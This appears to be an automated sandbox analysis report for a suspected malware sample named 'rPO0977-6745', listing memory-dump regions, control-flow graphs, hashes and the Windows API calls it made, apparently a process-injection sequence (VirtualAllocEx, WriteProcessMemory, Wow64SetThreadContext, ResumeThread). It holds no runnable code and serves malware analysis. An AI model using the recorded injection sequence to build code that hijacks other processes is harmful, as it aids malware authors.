                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 2bfe8f344a6ec3bc217047faab568a431116e11411379c4a11b046a06deb5462
                                              • Instruction ID: 757e41f051bb8a11718d7a2e506c6c9202139f1e2b119068a499fbcdfb2279c9
                                              • Opcode Fuzzy Hash: 2bfe8f344a6ec3bc217047faab568a431116e11411379c4a11b046a06deb5462
                                              • Instruction Fuzzy Hash: 462104B2D003599FDF10CFA9C881BEEBBF6BF48350F14842AE959A7250C7789950CB64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 694 8d148a0-8d148ee 696 8d148f0-8d148fc 694->696 697 8d148fe-8d1493d WriteProcessMemory 694->697 696->697 699 8d14946-8d14976 697->699 700 8d1493f-8d14945 697->700 700->699
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08D14930
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a7ceafa3485d109c3e25e35a3e7b424ab5eb87deedd09dda3f4558f031963d53
                                              • Instruction ID: 6f6eb37e6b2c395bc82b94efd0c2a8d8f78d0177008d196932a90a0f1829961e
                                              • Opcode Fuzzy Hash: a7ceafa3485d109c3e25e35a3e7b424ab5eb87deedd09dda3f4558f031963d53
                                              • Instruction Fuzzy Hash: 642104719003599FDF10CFAAC880BDEBBF5BF48310F14842AE958A7240C7789950CBA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 704 8d14700-8d14753 707 8d14763-8d14793 Wow64SetThreadContext 704->707 708 8d14755-8d14761 704->708 710 8d14795-8d1479b 707->710 711 8d1479c-8d147cc 707->711 708->707 710->711
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08D14786
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 7ab9ba43b28ffa42d4ab8aa9ec5b656547d4045d743e25deba39ac8fe78939c4
                                              • Instruction ID: 901fab1f2f6d6c62179501708a42228bd28c162f607fb223d23dbe254b571145
                                              • Opcode Fuzzy Hash: 7ab9ba43b28ffa42d4ab8aa9ec5b656547d4045d743e25deba39ac8fe78939c4
                                              • Instruction Fuzzy Hash: E5214571D003099FDB10DFAAC4817AEBBF5EF48324F14842AD419A7640DB789945CBA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 715 8d14989-8d14a1d ReadProcessMemory 719 8d14a26-8d14a56 715->719 720 8d14a1f-8d14a25 715->720 720->719
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08D14A10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: b3b269161789da8288368cfd0f2d15d70f852705009cbb80df039cb5a16ac13b
                                              • Instruction ID: 5806f5894d1e4d80d852affac4267b84731ce17d55436868d7ab3fe88204a090
                                              • Opcode Fuzzy Hash: b3b269161789da8288368cfd0f2d15d70f852705009cbb80df039cb5a16ac13b
                                              • Instruction Fuzzy Hash: 702126B1C002499FDB10CFAAC880BDEBBF5FF48310F54842AE518A7240D7799500DB69
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08D14A10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: b60915fff9c24301875657e5650d304fee18026449339fbd00ec9ad2b1438730
                                              • Instruction ID: 905354f220d38adc3cea64983eabccd193c881ae1d55dcb19211dd95a7d380fa
                                              • Opcode Fuzzy Hash: b60915fff9c24301875657e5650d304fee18026449339fbd00ec9ad2b1438730
                                              • Instruction Fuzzy Hash: A42105B1C003599FDB10DFAAC880BDEBBF5FF48310F14842AE518A7240D7799500DBA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 724 8d14708-8d14753 726 8d14763-8d14793 Wow64SetThreadContext 724->726 727 8d14755-8d14761 724->727 729 8d14795-8d1479b 726->729 730 8d1479c-8d147cc 726->730 727->726 729->730
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08D14786
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: a462c4a1b628e82e5f72e5c081e1fbb01791f96f9cf7e448cff48931732bab6e
                                              • Instruction ID: bd7690550d798bb9b4ca7ca555c3d57338c02fb69c48a541ee0e6b72c96f5d6e
                                              • Opcode Fuzzy Hash: a462c4a1b628e82e5f72e5c081e1fbb01791f96f9cf7e448cff48931732bab6e
                                              • Instruction Fuzzy Hash: EF213471D003099FDB14DFAAC484BAEBBF5AF48324F14842ED419A7640CB78A944CBA9
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 37ab1ffd96d592b0eef9843037efa74931e0bbbde3c8d5868520433c323c4918
                                              • Instruction ID: 051aeb0bca833b666251cae5000f63b259028796c8cbdf602dbf7d1c6057bd7a
                                              • Opcode Fuzzy Hash: 37ab1ffd96d592b0eef9843037efa74931e0bbbde3c8d5868520433c323c4918
                                              • Instruction Fuzzy Hash: 1921E2B5D002489FDB10CFAAD984ADEFBF8FB48314F14841AE918A3350D379A950CFA5
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 8d84aae8d4038bb38dd4dd822a6e5429bc353885cd7de538dba0cc641e931711
                                              • Instruction ID: a0b0d2ba77cd6d859cc321791a0f9c61e600bf5b3648ba4c1e5a9a016a57d931
                                              • Opcode Fuzzy Hash: 8d84aae8d4038bb38dd4dd822a6e5429bc353885cd7de538dba0cc641e931711
                                              • Instruction Fuzzy Hash: DF21E3B5D00258DFDB10CFA9D984ADEBBF5EB48314F14841AE918A3350D378A951CF65
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08D1484E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 6f1bf0e881f637389aa5c7e4e445dcf5f2ab5fb7614e07b4cf445d4aa25b130d
                                              • Instruction ID: 9633f2f5aeba2cf87b6b644d765f2011186f74737c4b741e63e64e163cbd3ada
                                              • Opcode Fuzzy Hash: 6f1bf0e881f637389aa5c7e4e445dcf5f2ab5fb7614e07b4cf445d4aa25b130d
                                              • Instruction Fuzzy Hash: C2212472C002489FDF20CFAAD844BEEBBF2AF48324F14841AE459A7650D7759901CFA5
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B079,00000800,00000000,00000000), ref: 02F7B28A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 959b98fff188d8f58a901d510d16505af47b6205c5fc32cd290363dda003ca54
                                              • Instruction ID: 0800a4922d7d20f7c5289a1ebb064cc45d27d0417cb3700b3c0b8ecc19ebe776
                                              • Opcode Fuzzy Hash: 959b98fff188d8f58a901d510d16505af47b6205c5fc32cd290363dda003ca54
                                              • Instruction Fuzzy Hash: 001112B6D013088FDB21CFAAC844BDEFBF4EB49314F14842AE919A7210C375A545CFA9
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B079,00000800,00000000,00000000), ref: 02F7B28A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 28211366d153e53e35e19c81ef9920f45c6cb9f342547d188803bd076fc47e0d
                                              • Instruction ID: a1dd79d36a34e2d6a5d76535e91d9cde8c18bd543686977d90091571ee0212e5
                                              • Opcode Fuzzy Hash: 28211366d153e53e35e19c81ef9920f45c6cb9f342547d188803bd076fc47e0d
                                              • Instruction Fuzzy Hash: 3F1114B6C003088FDB24CF9AC844BDEFBF4EB48314F14842AD919A7210C375A545CFA5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 01ce6a28225b38be22c8d32933c493fe49c50358ac1743b29b8de86ac1a2a997
                                              • Instruction ID: 8facd0a1da6e007b117824785ecc963c99080e0e90b10918ced60b102580b2f8
                                              • Opcode Fuzzy Hash: 01ce6a28225b38be22c8d32933c493fe49c50358ac1743b29b8de86ac1a2a997
                                              • Instruction Fuzzy Hash: 32113471D003588FDB24DFAAC48479EFBF5EF48324F24882AD419A7640D779A944CBA9
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08D1484E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 3c51475b57bf228c643f1979f012b4594aedf06816916ce55fe6f1d0ad38306e
                                              • Instruction ID: 8c77129d186a8f08675989d7e0d7b392b5e9d86df40f49cd4c968d2349218bc9
                                              • Opcode Fuzzy Hash: 3c51475b57bf228c643f1979f012b4594aedf06816916ce55fe6f1d0ad38306e
                                              • Instruction Fuzzy Hash: 2C115672C003489FDF20DFAAC844BDEBBF6EF48320F14841AE519A7250C7759500CBA9
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 299580df628ff6562a517161d540550c557f7c09f86d924680c5630f740d3002
                                              • Instruction ID: 5f03f3f3e0b6b72436fc794223837453036fcfc562f24e850de8af376312519a
                                              • Opcode Fuzzy Hash: 299580df628ff6562a517161d540550c557f7c09f86d924680c5630f740d3002
                                              • Instruction Fuzzy Hash: 421125B1D003488FDB24DFAAC44479EFBF5AF88324F24841ED419A7640CB79A940CBA9
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08D1A425
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 2da18b0ee1d1c86021a52c22773e6c1c03c293444f2125a5e138240f49ba7b78
                                              • Instruction ID: cc7eba2c25e012c38c49c59362d3f6d1e004fef288155e6b49f0f036981351c0
                                              • Opcode Fuzzy Hash: 2da18b0ee1d1c86021a52c22773e6c1c03c293444f2125a5e138240f49ba7b78
                                              • Instruction Fuzzy Hash: 7F11DFB58003599FDB20CF9AD889BDEFBF8EB48320F10845AE518A7250D375A944CFA5
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: ffda5d41e15d024a0981779f6ec9fff4b1c52783f5be7ccba5c082d438a23489
                                              • Instruction ID: 0b1aaa29616aef751892c0830c6a54da2c4c8a0ef2bca66977f4024f313165bb
                                              • Opcode Fuzzy Hash: ffda5d41e15d024a0981779f6ec9fff4b1c52783f5be7ccba5c082d438a23489
                                              • Instruction Fuzzy Hash: DF1110B6C002498FDB20CF9AC444BDEFBF4FB88318F14841AD528A7210D379A545CFA5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08D1A425
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 3ae8de066bb2ac8e727d5c2282d08ce47cce336ff6b612f3747aa203cd019a89
                                              • Instruction ID: 1bf8aad28522e4ddb12eda19cecd7df6e98c5fd57618b25d773595a16c738de6
                                              • Opcode Fuzzy Hash: 3ae8de066bb2ac8e727d5c2282d08ce47cce336ff6b612f3747aa203cd019a89
                                              • Instruction Fuzzy Hash: EC11F2B58003589FDB20DF9AD888BDEBBF8EB48320F14841AE558A7240D375A944CFA5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263050475.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13cd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e570ad46e4d2f5d855754698ec75d6cad93d28ee6d61ebb44276d8f161e49f3d
                                              • Instruction ID: 34f52b50e3a0ed04cfb2eef901a8e6c37723bb702fe238faead70943de79ac3c
                                              • Opcode Fuzzy Hash: e570ad46e4d2f5d855754698ec75d6cad93d28ee6d61ebb44276d8f161e49f3d
                                              • Instruction Fuzzy Hash: 5C210271504204EFDB15DF54D9C0B56BBA5FB84718F20816CEA0A1B256C736E846CBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263050475.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13cd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c28120a684342c95e222218d71b99c6f58c48b5d1dc8a7e51c2a634bd17b98c1
                                              • Instruction ID: 1e7815d784619cfc139216fee6f8a9d4abe69d7ef1776cf748408fdb672226c6
                                              • Opcode Fuzzy Hash: c28120a684342c95e222218d71b99c6f58c48b5d1dc8a7e51c2a634bd17b98c1
                                              • Instruction Fuzzy Hash: A0212172500204EFDB15DF54D9C0B26BBA5FB9871CF20857DE9090B656C336D846CBE2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263637209.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13dd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7d5dfc939bfaa8e0a8b91b349c477c6a615740a8cfada9d13bf0164041db289
                                              • Instruction ID: 55d3dfcb3b5272ac597c979ef6c5040b92d5ce00b2a98019691e8c23740832f5
                                              • Opcode Fuzzy Hash: e7d5dfc939bfaa8e0a8b91b349c477c6a615740a8cfada9d13bf0164041db289
                                              • Instruction Fuzzy Hash: 1F212272604304EFDB25DF64E9C0B16BBA5FBC8318F20C56DE80A0B686C336D447CA62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263637209.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13dd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdf292756531590e05c958d5fa2e65b58c76597eda16c7339603c232b2076510
                                              • Instruction ID: 76146b6dfe55fdbc3287ac12930f5311033c21644a0b5bda3b8048aea1331c3c
                                              • Opcode Fuzzy Hash: fdf292756531590e05c958d5fa2e65b58c76597eda16c7339603c232b2076510
                                              • Instruction Fuzzy Hash: 0421D472904304EFDB15DFA4E9C0B26BBA5FB84328F24C56DE9494B692C336D446CA61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263637209.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13dd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a23ce806e8b8abe96b10b38a0f05d35fdf0a0e599db6ea0d1598b2668b2f29b
                                              • Instruction ID: f37a66cae672a89f3ea5f9a7877b6dd7ee92922564a530e47e6c68810a165f9c
                                              • Opcode Fuzzy Hash: 4a23ce806e8b8abe96b10b38a0f05d35fdf0a0e599db6ea0d1598b2668b2f29b
                                              • Instruction Fuzzy Hash: 50219F765093808FCB13CF24D994715BF71EB85218F28C5EAD8498B6A7C33A940ACB62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263050475.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13cd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                              • Instruction ID: afbb58825e248b50573b3bfd25fad02d8b9ccdfe67b42aba1e240f5465afa06f
                                              • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                              • Instruction Fuzzy Hash: F311DF76404280CFCB12CF54D9C4B16BF71FB94718F24C6ADE8090B656C336D856CBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263050475.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13cd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                              • Instruction ID: 5a9e742faf07953bb027a1d8d5309be51f8770298cf87302e85ec53c04f570f4
                                              • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                              • Instruction Fuzzy Hash: 9D11CD72404240DFCB12CF54D9C4B56BF61FB84328F2486ADE9090B656C33AE856CBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263637209.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13dd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                              • Instruction ID: 8db0c9319333ea804b88ecee3a5a3bc2c123ab05a11930dc07654c3fec0a7c9c
                                              • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                              • Instruction Fuzzy Hash: E0118B76504280DFDB16CF54E5C4B15BBB1FB84328F24C6A9D8494B696C33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263050475.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13cd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4898e588e0f4e93ab20d1e88d4177b221a17b069bbccc7a421fdee8090747b00
                                              • Instruction ID: 72ddffd08e02ce111355d2214f1e1b1e5ab1057dfdda19a132aee8ae7feed153
                                              • Opcode Fuzzy Hash: 4898e588e0f4e93ab20d1e88d4177b221a17b069bbccc7a421fdee8090747b00
                                              • Instruction Fuzzy Hash: 77018471404384AEE7205E66CC84766FBD8DF41A28F18852EFD090A286C7799840CBF1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1263050475.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_13cd000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c08188031d616a5700d7f0f47058d36b3f03374994d77920bddea4c022b08c04
                                              • Instruction ID: 08f50eb16c65bd241a31bda093c5de56e2de1f9d9917e46c2997a9ac2238c4e8
                                              • Opcode Fuzzy Hash: c08188031d616a5700d7f0f47058d36b3f03374994d77920bddea4c022b08c04
                                              • Instruction Fuzzy Hash: 83F06271404384AEE7208E1ADD84B62FFA8EF51628F18C55EFD084B297C3799844CBB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHq$PHq
                                              • API String ID: 0-1274609152
                                              • Opcode ID: 1eaf474ef9d95e66f2fc2d5852287591e81da255872883f7f92503cf36cdbe2a
                                              • Instruction ID: 0412aab641bc39566566711f936bb1df9f89fc1d81d4b39e8a6c312027b95e9d
                                              • Opcode Fuzzy Hash: 1eaf474ef9d95e66f2fc2d5852287591e81da255872883f7f92503cf36cdbe2a
                                              • Instruction Fuzzy Hash: 78D1B074B00605CFDB18DF69E598AA9B7F1BF88751F2581A8E406AB361DB31ED01CB60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79e9d836b9e45eebcfbcea1ffdc4bc86499c6980dbab410d3b5c4445047b886d
                                              • Instruction ID: b0ded6538e5f04ab0227a4de34ad5c91a4a2ab02ff07e65f701f41349e5626dc
                                              • Opcode Fuzzy Hash: 79e9d836b9e45eebcfbcea1ffdc4bc86499c6980dbab410d3b5c4445047b886d
                                              • Instruction Fuzzy Hash: 1CD1EA70702710AFDB29DB75D850BAEB7F7AF88782F14856ED2068B290DB35D902CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0445b8677856bcbcb26fdfdac053a0d9ac93cb283ae2ba1030dba71d91c87df2
                                              • Instruction ID: 0d3947b9ace5ce0f12683ec8fde39d7afcca591585fa54cd868a0283e25b8cba
                                              • Opcode Fuzzy Hash: 0445b8677856bcbcb26fdfdac053a0d9ac93cb283ae2ba1030dba71d91c87df2
                                              • Instruction Fuzzy Hash: C8E11874E002199FDB18DFA9D584AAEBBF2FF88305F248269D414AB355DB34AD41CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b85a835419911bc34c85aa81e968dd3b2d49f6126ad8aa21149091f4160bd9b
                                              • Instruction ID: ac1626fb03b72957a335a89e902f6cd6630e08c8809fe058adb5138efbc64f64
                                              • Opcode Fuzzy Hash: 5b85a835419911bc34c85aa81e968dd3b2d49f6126ad8aa21149091f4160bd9b
                                              • Instruction Fuzzy Hash: B7E10374E002199FDB14CFA9D584AAEBBF2FF89345F248269D414AB355CB30AD42CF64
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d7cb2f3870c78a84582399914018a7015ceb8c5468d6e204f5d4633cf9df947
                                              • Instruction ID: 9e8b0f6979d3d69bbd1711f01174c05531c6154caf81f9bf207c3ba90d9be935
                                              • Opcode Fuzzy Hash: 1d7cb2f3870c78a84582399914018a7015ceb8c5468d6e204f5d4633cf9df947
                                              • Instruction Fuzzy Hash: 6CE10374E002199FDF14CBA9C584AAEBBF2EF89345F248269D514AB355DB30AD42CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99ec9a7fa59c1b0bf83027c1de9a2d7eb5694dee59776a37599c30a192348e8a
                                              • Instruction ID: 564dd96830d404824e43e2710c20b74df0618b6f15df75075ea6b5542e51c394
                                              • Opcode Fuzzy Hash: 99ec9a7fa59c1b0bf83027c1de9a2d7eb5694dee59776a37599c30a192348e8a
